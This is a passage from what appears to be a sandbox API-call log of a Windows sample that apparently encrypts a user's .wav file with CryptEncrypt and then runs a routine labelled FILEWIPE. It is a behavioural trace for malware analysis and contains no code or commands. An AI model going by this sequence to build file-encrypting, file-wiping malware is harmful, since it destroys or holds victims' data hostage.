Flags=0x0, Size=0x20) returned 0x8dead8 [0186.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0186.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0186.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0186.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0186.386] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0186.386] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.387] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0186.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0186.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0186.387] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0186.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0186.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0186.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0186.387] CryptGetKeyParam (in: hKey=0x90aed8, dwParam=0x7, pbData=0x9c2888, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2888*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0186.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0186.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0186.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0186.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0186.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0186.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0186.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0186.387] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0186.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0186.387] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0186.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0186.388] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0186.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0186.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0186.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0186.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0186.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d460 [0186.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0186.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0186.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0186.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0186.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0186.388] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0186.388] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0186.388] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.388] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.388] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.388] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.388] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.388] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0186.388] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0186.389] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0186.389] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0186.389] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0186.389] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0186.389] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0186.389] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0186.389] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0186.389] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0186.389] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.389] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.389] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.389] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.389] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.389] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0186.389] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.389] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x8f92, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x8fa0) returned 1 [0186.390] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.390] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.390] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.390] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.390] CharLowerBuffW (in: lpsz="byte[36769]", cchLength=0xb | out: lpsz="byte[36769]") returned 0xb [0186.390] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.391] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.391] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.391] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0186.391] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.392] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xc04ef8*, pdwDataLen=0x87e820*=0x8f92, dwBufLen=0x8fa0 | out: pbData=0xc04ef8*, pdwDataLen=0x87e820*=0x8fa0) returned 1 [0186.414] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.414] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.414] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.416] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.416] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.416] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.417] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0186.417] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0186.417] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0186.417] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0186.417] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0186.417] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0186.417] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0186.417] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0186.417] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0186.417] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0186.417] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.421] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.421] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.421] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.426] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.426] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.426] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0186.426] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0186.426] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.426] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0186.426] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.426] CryptDestroyKey (hKey=0x90aed8) returned 1 [0186.427] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0186.427] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0186.427] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0186.427] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0186.427] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0186.427] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0186.427] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0186.427] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0186.427] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0186.427] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0186.427] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0186.427] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0186.427] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0186.427] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0186.427] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.427] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0186.427] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.427] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0186.428] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0186.428] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0186.428] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.444] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0186.444] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0186.444] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.444] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.444] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0186.444] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0186.445] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0186.445] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.445] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0186.445] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.445] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.445] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0186.445] FreeLibrary (hLibModule=0x74f20000) returned 1 [0186.445] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.445] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.445] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.445] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.446] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.450] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0186.450] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0186.450] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.450] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.450] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.wav", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbe5ec70, ftCreationTime.dwHighDateTime=0x1d5d8d9, ftLastAccessTime.dwLowDateTime=0xa5315d20, ftLastAccessTime.dwHighDateTime=0x1d5e38c, ftLastWriteTime.dwLowDateTime=0xa5315d20, ftLastWriteTime.dwHighDateTime=0x1d5e38c, nFileSizeHigh=0x0, nFileSizeLow=0x8f92, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="WWUbMhmKz.wav", cAlternateFileName="WWUBMH~1.WAV")) returned 0x90ae18 [0186.450] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0186.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0186.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0186.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0186.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0186.451] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0186.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0186.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0186.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0186.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0186.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0186.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0186.451] CharLowerBuffW (in: lpsz="byte[36754]", cchLength=0xb | out: lpsz="byte[36754]") returned 0xb [0186.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0186.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0186.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0186.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0186.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0186.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0186.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0186.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0186.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0186.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0186.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0186.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0186.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0186.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0186.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0186.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0186.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0186.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0186.453] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, 